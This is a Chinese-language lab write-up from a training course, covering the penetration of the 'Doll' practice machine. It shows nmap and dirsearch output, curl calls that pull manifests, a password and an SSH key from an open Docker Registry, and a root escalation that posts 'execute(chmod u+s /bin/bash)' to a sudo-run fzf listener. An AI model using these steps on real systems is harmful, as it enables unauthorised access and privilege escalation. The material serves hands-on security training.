Doll靶机渗透
Ms08067暑假班第一天渗透靶机Doll
回忆渗透流程:信息收集->漏洞扫描->漏洞利用->权限提升->权限维护
开始渗透
使用 nmap 扫描靶机,由 ifconfig 知道我们自己的靶机IP为192.168.47.139,靶机的IP地址为192.168.47.148。
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# nmap 192.168.47.0/24 Nmap scan report for 192.168.47.148
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
1007/tcp open unknown
MAC Address: 00:0C:29:DF:E2:AC (VMware)Nmap scan report for 192.168.47.139
Host is up (0.0000050s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh得到指定的开放端口,使用版本扫描执行命令,弄清楚这些端口是干嘛的是什么东西。
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# nmap -sV -p22,1007 192.168.47.148
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-13 21:56 EDT
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 21:57 (0:00:21 remaining)
Nmap scan report for 192.168.47.148
Host is up (0.00052s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
1007/tcp open http Docker Registry (API: 2.0)
MAC Address: 00:0C:29:DF:E2:AC (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.55 seconds
先信息收集一波,明确了1007端口是什么东西,直接上百度搜索Docker Registry (API: 2.0)浏览器访问一下发现是空白页面。
Docker Registry API V2 提供了一组用于与 Docker 镜像仓库进行交互的 RESTful API。这些 API 允许用户管理镜像的上传、下载、删除等操作。以下是一些常用的 API 及其使用方法。
使用 dirsearch 目录扫描执行命令dirsearch -u http://192.168.47.148:1007/ ,发现两个目录,/v2 和/v2/_catalog ,其中/v2/_catalog 是列出所有存储库
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# dirsearch -u http://192.168.47.148:1007/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/kali/Desktop/reports/http_192.168.47.148_1007/__25-07-13_22-02-13.txtTarget: http://192.168.47.148:1007/[22:02:13] Starting:
[22:02:13] 301 - 0B - /%2e%2e//google.com -> /google.com
[22:02:13] 301 - 0B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -> /etc/passwd
[22:02:22] 301 - 0B - /axis2-web//HappyAxis.jsp -> /axis2-web/HappyAxis.jsp
[22:02:22] 301 - 0B - /axis2//axis2-web/HappyAxis.jsp -> /axis2/axis2-web/HappyAxis.jsp
[22:02:22] 301 - 0B - /axis//happyaxis.jsp -> /axis/happyaxis.jsp
[22:02:23] 301 - 0B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -> /etc/passwd
[22:02:23] 301 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[22:02:26] 301 - 0B - /engine/classes/swfupload//swfupload_f9.swf -> /engine/classes/swfupload/swfupload_f9.swf
[22:02:26] 301 - 0B - /engine/classes/swfupload//swfupload.swf -> /engine/classes/swfupload/swfupload.swf
[22:02:27] 301 - 0B - /extjs/resources//charts.swf -> /extjs/resources/charts.swf
[22:02:28] 301 - 0B - /html/js/misc/swfupload//swfupload.swf -> /html/js/misc/swfupload/swfupload.swf
[22:02:43] 301 - 39B - /v2 -> /v2/
[22:02:43] 200 - 2B - /v2/
[22:02:43] 200 - 27B - /v2/_catalog Task Completed
访问200的/v2/ 查看有无可利用点,发现空空如也,继续访问/v2/_catalog 列出所有存储库,发现dolly 存储库,继续访网页访问v2/dolly ,发现回显的是404
获取镜像列表执行命令curl http://192.168.47.148/v2/dolly/tags/list 可以看到获取的镜像列表里面有latest
发现失败
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# curl http://192.168.47.148:1007/v2/dolly/tags/list
{"name":"dolly","tags":["latest"]}
获取镜像清单执行命令curl http://192.168.47.148/v2/dolly/manifests/latest 这里可以看到history 里面存在敏感信息name、passwd等等
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# curl http://192.168.47.148:1007/v2/dolly/manifests/latest
{"schemaVersion": 1,"name": "dolly","tag": "latest","architecture": "amd64","fsLayers": [{"blobSum": "sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017"},{"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"},{"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"},{"blobSum": "sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09"}],"history": [{"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"10ddd4608cdf\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"Image\":\"doll\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"10ddd4608cdfd81cd95111ecfa37499635f430b614fa326a6526eef17a215f06\",\"container_config\":{\"Hostname\":\"10ddd4608cdf\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"Image\":\"doll\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2023-04-25T08:58:11.460540528Z\",\"docker_version\":\"23.0.4\",\"id\":\"89cefe32583c18fc5d6e6a5ffc138147094daac30a593800fe5b6615f2d34fd6\",\"os\":\"linux\",\"parent\":\"1430f49318669ee82715886522a2f56cd3727cbb7cb93a4a753512e2ca964a15\"}"},{"v1Compatibility": "{\"id\":\"1430f49318669ee82715886522a2f56cd3727cbb7cb93a4a753512e2ca964a15\",\"parent\":\"638e8754ced32813bcceecce2d2447a00c23f68c21ff2d7d125e40f1e65f1a89\",\"comment\":\"buildkit.dockerfile.v0\",\"created\":\"2023-03-29T18:19:24.45578926Z\",\"container_config\":{\"Cmd\":[\"ARG passwd=devilcollectsit\"]},\"throwaway\":true}"},{"v1Compatibility": "{\"id\":\"638e8754ced32813bcceecce2d2447a00c23f68c21ff2d7d125e40f1e65f1a89\",\"parent\":\"cf9a548b5a7df66eda1f76a6249fa47037665ebdcef5a98e7552149a0afb7e77\",\"created\":\"2023-03-29T18:19:24.45578926Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"},{"v1Compatibility": "{\"id\":\"cf9a548b5a7df66eda1f76a6249fa47037665ebdcef5a98e7552149a0afb7e77\",\"created\":\"2023-03-29T18:19:24.348438709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:9a4f77dfaba7fd2aa78186e4ef0e7486ad55101cefc1fabbc1b385601bb38920 in / \"]}}"}],"signatures": [{"header": {"jwk": {"crv": "P-256","kid": "TBHC:2ZQV:4NEZ:276S:BTKG:CNKA:SCBO:2BFG:GHAA:L62S:RXHZ:NJV4","kty": "EC","x": "EEkEcC8lZj84RLqmKK4up7vZTq-TAl8oDsvPngkmVb0","y": "-Zl9c1VCVQfRhut44GHSHHZMW4ME08AQJVpl1P_4WRM"},"alg": "ES256"},"signature": "bpOWxNLpEwmr7GNdJ57RXWiJv6qF1J05Lw0SwCIXlbSMFInKfzejyi_SbW3xrY4zcaDmqS4H30_byFlgz34ZLQ","protected": "eyJmb3JtYXRMZW5ndGgiOjI4MjksImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyNS0wNy0xNFQwMjowODo0N1oifQ"}]
}
执行命令 curl http://192.168.47.148/v2/dolly/blobs/sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017 -o blob.tar 获取镜像层文件
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# curl http://192.168.47.148:1007/v2/dolly/blobs/sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017 -o blob.tar% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed
100 3707 100 3707 0 0 752k 0 --:--:-- --:--:-- --:--:-- 905k
tar -xf blob.tar 将获取到的文件解压
发现有/root /home /etc 目录文件,进去信息收集,先进入root ls -al 发现.bash_history历史命令文件,发现创建了一个bela的用户,这里我们进入/etc文件目录ls -al 发现配置文件,查看
ssh bela@192.168.47.148 -i id_rsa 填入密码devilcollectsit 成功连接
┌──(root㉿Xudde)-[/home/…/Desktop/home/bela/.ssh]
└─# ssh bela@192.168.47.148 -i id_rsa
The authenticity of host '192.168.47.148 (192.168.47.148)' can't be established.
ED25519 key fingerprint is SHA256:HWsmY0zUYHV1M+0fOxSA4gbKv2xMIbJUGpnQgV+Tuvg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.47.148' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux doll 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 25 10:35:13 2023 from 192.168.0.100
bela@doll:~$
sudo -l 查看权限配置
bela@doll:~$ sudo -l
Matching Defaults entries for bela on doll:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser bela may run the following commands on doll:(ALL) NOPASSWD: /usr/bin/fzf --listen\=1337
执行命令sudo /usr/bin/fzf --listen=1337 开启文件端口监听
bela@doll:/$ sudo /usr/bin/fzf --listen\=1337
方法一:打开另一个终端执行curl -X POST --data ‘execute(chmod u+s /bin/bash)’ http://127.0.0.1:1337 这里给/bin/bash加 u 的权限
┌──(root㉿Xudde)-[/home/…/Desktop/home/bela/.ssh]
└─# curl -X POST --data 'execute(chmod u+s /bin/bash)' http://192.168.47.148:1337
方法二:不行就连接再连接一次ssh 执行curl -X POST --data ‘execute(chmod u+s /bin/bash)’ http://127.0.0.1:1337 这里给/bin/bash加 u 的权限
bela@doll:/tmp$ curl -X POST --data 'execute(chmod u+s /bin/bash)' http://127.0.0.1:1337
使用/bin/bash -p 提权
bela@doll:/tmp$ /bin/bash -p
bash-5.1# id
uid=1000(bela) gid=1000(bela) euid=0(root) grupos=1000(bela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
bash-5.1#
成功获取root 权限
总结一下本次渗透流程:nmap靶机发现->nmap扫描靶机端口信息->信息收集端口信息信息->查看web页面信息->dirsearch扫描web目录->利用信息收集信息->web网站列出所有存储库->请求获取靶机镜像列表->请求获取靶机镜像清单->收集敏感信息收获passwd->请求获取镜像层文件->查看文件敏感信息->利用敏感信息登录bela用户->登陆成功查看权限信息->利用权限信息进行提权->提权成功获取最高权限